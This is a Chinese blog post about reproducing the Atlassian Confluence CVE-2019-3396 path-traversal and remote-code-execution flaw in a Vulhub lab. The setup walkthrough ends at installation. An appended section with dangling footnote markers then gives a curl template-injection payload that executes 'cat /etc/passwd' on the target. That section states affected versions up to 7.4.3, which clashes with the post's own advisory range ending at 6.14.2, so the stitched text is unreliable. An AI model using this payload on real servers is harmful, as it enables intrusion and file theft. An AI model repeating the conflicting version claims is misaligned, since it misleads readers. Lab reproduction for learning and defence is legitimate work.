Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

本文详细介绍了如何复现Atlassian Confluence的CVE-2019-3396漏洞,涉及路径穿越和远程代码执行。通过Vulhub环境,演示了从安装Confluence到利用漏洞读取系统文件(如`/etc/passwd`)和执行远程代码的过程。修复该漏洞的方法是升级Confluence到最新版本。

Vulhub漏洞系列:Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

00.前言


这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺


01.Atlassian Confluence 简介

  Atlassian Confluence(简称Confluence)是一个专业的wiki程序(是一种在网络上开放且可供多人协同创作的超文本系统)。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。
  Confluence 不是一个开源软件,非商业用途可以免费使用。
其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息,文档协作,集体讨论;目前,Confluence被用于广泛地用于项目团队,开发团队,市场销售团队。


02.漏洞描述

  在Widget连接器中的Confluence Server和Data Center中存在一个服务器端模板注入漏洞。 攻击者可以利用此问题在运行漏洞版本的Confluence Server或Data Center的系统上实现服务器端模板注入,路径遍历和远程代码执行。

  6.6.12之前的版本,从6.12.3之前的6.7.0版本(6.12.x的固定版本)到6.13.3之前的版本6.13.0(6.13的固定版本)的所有版本的Confluence Server和Confluence数据中心。 x)和6.14.2之前的6.14.0版本(6.14.x的固定版本)开始。

参考:https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

原理:https://paper.seebug.org/884/


03.漏洞复现

靶机ip:192.168.10.139,os:Ubuntu 16.04 LTS
攻击主机:ip:192.168.10.131, os:Win7,工具:burpsuite

  老样子:首先,在vulhub-master中漏洞的相应位置打开终端,输入docker-compose up -d打开环境:

  docker-compose up -d

  然后输入docker ps查看环境是否打开成功:

  docker ps

  成功后接下来便可以开始漏洞的复现了。访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons):

0x01安装


1:选择“Trial installation”
在这里插入图片描述


2:点击“Get an evaluation license”
在这里插入图片描述


3:申请一个Confluence Server的测试证书(不要选择Data Center和Addons)

在这里插入图片描述


4:申请的时候比较慢,将KEY复制并粘贴到登录页,然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。
在这里插入图片描述


5:如果提示填写cluster node,路径填写 /home/confluence即可

### 关于Confluence文件读取漏洞CVE-2019-3396) #### 漏洞概述 Atlassian Confluence 存在一个路径遍历和命令执行漏洞,编号为CVE-2019-3396。此漏洞允许攻击者通过精心构造的请求来读取任意文件或执行系统命令[^1]。 #### 影响范围 受影响的产品版本包括但不限于: - Atlassian Confluence Server 和 Data Center 版本 5.8.0 至 7.4.3 - 使用 `widgetconnector` 插件的所有版本 #### 漏洞原理 该漏洞源于 Confluence 的一个小部件连接器功能,在处理特定类型的 URL 参数时未能正确验证输入,从而导致可以被用来触发服务器端模板注入 (SSTI),进而实现远程代码执行(RCE)[^4]。 #### 利用方式 为了在VulFocus环境中重现并测试这个漏洞,通常会按照如下方式进行设置操作: 1. 配置好含有易受攻击插件版本的Confluence实例; 2. 构造恶意payload发送给目标服务; 3. 成功获取敏感信息或执行命令; 具体来说,可以通过向 `/rest/tinymce/1/macro/preview` 接口提交特制参数来进行攻击尝试。例如,利用 Groovy 脚本来读取/etc/passwd 文件的内容作为演示目的之一[^2]。 ```bash curl -X POST http://target/rest/tinymce/1/macro/preview \ -H 'Content-Type: application/json' \ --data '{"contentId":"78645","macro":{"name":"widget","body":"","params":{"url":"https://example.com\/%24%7B%22context.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22).invoke(null).exec(%22cat /etc/passwd%22).getText()%7D"}}}' ``` 请注意上述示例仅用于教育和技术研究用途,请勿非法使用。 #### 安全修复建议 官方已经发布了针对这个问题的安全更新,强烈建议用户尽快升级至最新稳定版以消除潜在风险。对于无法立即升级的情况,则应考虑禁用相关的小工具链接特性直至能够完成补丁部署为止[^3]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值